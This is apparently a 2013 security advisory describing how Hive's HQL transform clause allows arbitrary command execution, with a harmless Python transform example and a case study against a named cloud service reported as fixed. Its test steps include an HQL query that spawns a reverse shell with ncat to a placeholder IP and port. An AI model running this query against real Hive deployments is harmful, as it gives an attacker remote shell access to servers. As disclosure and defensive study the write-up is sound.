Date: 2013-02-09
Hive is a data warehouse infrastructure built on Hadoop. It provides a set of tools for data extraction, transformation, and loading (ETL), and a mechanism for storing, querying, and analyzing large-scale data stored in Hadoop. Hive defines a simple SQL-like query language called QL (also written HQL), which lets users familiar with SQL query the data. The language also lets developers familiar with MapReduce plug in custom mappers and reducers to handle complex analysis tasks that the built-in mappers and reducers cannot complete.
Vulnerability details:
HQL's transform clause lets a query specify a custom Map/Reduce script for Hive to run, and that script can invoke a shell, Python, or any other program on the cluster. As a result, an attacker who can submit queries through a Hive interface or a related entry point can execute arbitrary commands and obtain server permissions directly.
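To make the mechanism concrete, here is a minimal, benign sketch of what a transform script looks like. It assumes Hive's default behaviour for transform: each input row is written to the script's standard input as one tab-separated line, and each line the script writes to standard output is read back as a tab-separated row. The function name run_transform and the "double the id" logic are hypothetical and exist only for illustration.

```python
import io


def run_transform(stdin, stdout):
    """Read tab-separated rows from stdin and write transformed rows to stdout.

    Mirrors how a script named in a transform ... using clause would see data,
    assuming Hive's default tab-delimited, line-per-row serialization.
    """
    for line in stdin:
        line = line.rstrip("\n")
        if not line:
            continue  # skip blank lines
        fields = line.split("\t")
        row_id = int(fields[0])  # the single int column from the test table
        # Hypothetical transformation: emit the id and its double.
        stdout.write(f"{row_id}\t{row_id * 2}\n")


# Small in-memory demo: one input row containing the value 1.
demo_out = io.StringIO()
run_transform(io.StringIO("1\n"), demo_out)
print(demo_out.getvalue(), end="")
```

When used as a real transform script, the same function would be called with sys.stdin and sys.stdout. The point of the sketch is that Hive simply launches whatever program the query names and pipes rows through it, so the program is not restricted to row processing.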
Test code:
Create a new file /root/test whose content is 1 (or any other int value)
Create the test table
Create table if not exists kindle (id int);
Import data (this step is critical: without data in the table, the vulnerability is not triggered)
Load data local inpath '/root/test' into table kindle;
Use transform to specify the shell command that Hive runs, and spawn a reverse shell (ip and port are placeholders for the listener's address)
Select transform (id) USING '/usr/bin/ncat -e /bin/sh ip port' from kindle;
Delete the test table
Drop table kindle;
-------------- Evil split line ------------
Case studies:
Tested against the Treasure Data cluster (Hadoop-based Big Data as a Service on the Cloud | Treasure Data)
Process:
Repair status:
Treasure Data has been officially notified and the issue has been fixed, as shown in the official reply.